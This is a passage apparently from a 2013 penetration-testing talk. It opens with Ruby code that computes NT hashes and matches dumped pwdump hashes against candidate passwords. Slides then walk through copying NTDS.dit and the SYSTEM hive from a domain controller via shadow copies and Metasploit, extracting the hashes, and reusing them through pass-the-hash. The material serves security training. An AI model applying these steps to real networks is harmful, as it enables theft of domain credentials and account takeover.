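MD4_ADD = [0, 0x5A827999, 0x6ED9EBA1].freeze
MD4_FN  = [->(x, y, z) { (x & y) | ((x ^ MASK32) & z) }, # F
           ->(x, y, z) { (x & y) | (x & z) | (y & z) },  # G
           ->(x, y, z) { x ^ y ^ z }].freeze              # H

def md4(message)
  msg = message.b
  bit_len = msg.bytesize * 8
  msg += "\x80".b                                  # Merkle-Damgard padding
  msg += "\x00".b * ((56 - msg.bytesize) % 64)
  msg += [bit_len & MASK32, (bit_len >> 32) & MASK32].pack('VV')

  rol = ->(x, s) { x &= MASK32; ((x << s) | (x >> (32 - s))) & MASK32 }
  state = [0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476]
  (0...msg.bytesize).step(64) do |off|
    x = msg[off, 64].unpack('V16')
    v = state.dup
    3.times do |r|
      16.times do |i|
        t = (-i) % 4                                 # rotates through a, d, c, b
        v[t] = rol.(v[t] + MD4_FN[r].(v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4]) +
                    x[MD4_K[r][i]] + MD4_ADD[r], MD4_S[r][i % 4])
      end
    end
    state = state.zip(v).map { |a, b| (a + b) & MASK32 }
  end
  state.pack('V4').unpack1('H*')
end

# NT hash: MD4 of the password encoded as UTF-16LE, no salt
def nt_hash(password)
  md4(password.encode('UTF-16LE'))
end

# pwdump format (what pwdump/fgdump and the offline extractors emit):
# user:rid:lmhash:nthash:::
def parse_pwdump(text)
  text.each_line.map do |line|
    user, _rid, _lm, nt = line.strip.split(':')
    [user, nt.downcase] if user && nt && nt =~ /\A\h{32}\z/
  end.compact
end

# Offline check of dumped NT hashes against a candidate list: one MD4 per
# candidate, then hash-table lookups, so a big dump costs nothing extra
def match_nt_hashes(dumped, candidates)
  table = candidates.each_with_object({}) { |pw, h| h[nt_hash(pw)] = pw }
  dumped.each_with_object({}) do |(user, hash), hits|
    hits[user] = table[hash] if table.key?(hash)
  end
end

# Constructed sample, not a real dump; the third hash is simply one that is
# not in the candidate list below
SAMPLE_PWDUMP = <<~'EOS'
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:0cb6948805f797bf2a82807973b89537:::
EOS

if __FILE__ == $PROGRAM_NAME
  puts nt_hash('password')                        # 8846f7eaee8fb117ad06bdd830b7586c
  p match_nt_hashes(parse_pwdump(SAMPLE_PWDUMP), ['', 'password', 'Summer2013'])
end
```

Because the NT hash is unsalted, identical passwords produce identical hashes across every machine and account, which is why a dump of local SAM hashes is immediately reusable: the same table lookup works against the DC's NTDS.dit hashes, and the hash itself is usable for pass-the-hash without ever recovering the password. The aad3b435... LM field in the sample is the well-known "LM hash of nothing", the value you see when LM storage is disabled.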
  • 19. Dumping All the Hashes
    • The holy grail of most network pentests can be found inside an ESE (Extensible Storage Engine) database called NTDS.dit, located on the Domain Controller
      • Protected by the operating system (held open and locked while AD is running)
      • Requires injecting into lsass and/or other black magic
    • Contains a BOAT LOAD of information about the domain
      • Including password hashes and usernames for all AD accounts!
  • 20. Enter psexec_ntdsgrab.rb
    We can use the psexec_ntdsgrab module to create, or target an existing, VSC (Volume Shadow Copy) and safely pull down a copy of NTDS.dit to our attacking machine: auxiliary/admin/smb/psexec_ntdsgrab.rb
    1. Use the psexec mixin to execute Windows commands for creating a VSC
      • vssadmin create shadow /For=%SYSTEMDRIVE%
    2. Query vssadmin for the path to the newly created VSC
      • vssadmin list shadows
    3. Copy NTDS.dit from the VSC to the WINDOWS\Temp directory
      • copy /Y \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\WINDOWS\NTDS\NTDS.dit C:\WINDOWS\Temp\ntds
    4. Use reg.exe to make a copy of the SYSTEM registry hive (its boot key is needed to decrypt the hashes stored in NTDS.dit)
    5. Download the 'ntds' and 'sys' files to the attacking machine
    6. Clean up after ourselves
  • 21. Getting What We Want From NTDS.dit
    • We'll need to use the libesedb C library to extract the right tables from NTDS.dit
      • $ wget https://libesedb.googlecode.com/files/libesedb-alpha-20120102.tar.gz
      • $ tar xvzf libesedb-alpha-20120102.tar.gz
      • $ cd libesedb-20120102/
      • $ ./configure
      • $ make && make install
      • (the googlecode.com host has since shut down; the project now lives at https://github.com/libyal/libesedb)
    • Once libesedb is compiled we will use esedbexport, located in libesedb-20120102/esedbtools, to export the datatable, which contains the user account password hashes for AD
    • http://www.pentestgeek.com/2012/11/16/dumping-domain-password-hashes-using-metasploit-ntds_hashextract-rb/
  • 22. Closing
    • Uploading a binary shell to the target can be harmful to a penetration test
    • DCERPC allows us to do a lot of the functions we would ask of a binary shell without uploading one to the target
    • Metasploit modules already exist to achieve remote command execution, grab local/cached password hashes and dump AD hashes from a DC
    • The sky is the limit as to what else we could do if we all chose to adapt this style of thinking
  • 23. Any Questions? (10/9/2013)
  • 24. Thank You! So, You Want To Be A "Security Expert" (10/9/2013)
    Royce Davis, Accuvant LABS Senior Consultant, Attack & Pen Team
    royce.e.davis@gmail.com
    http://www.pentestgeek.com
    @R3dy__

Editor's Notes

  1. My definition of a pen test is…
  2. Transition into what can we do with a shell, why upload one in the first place?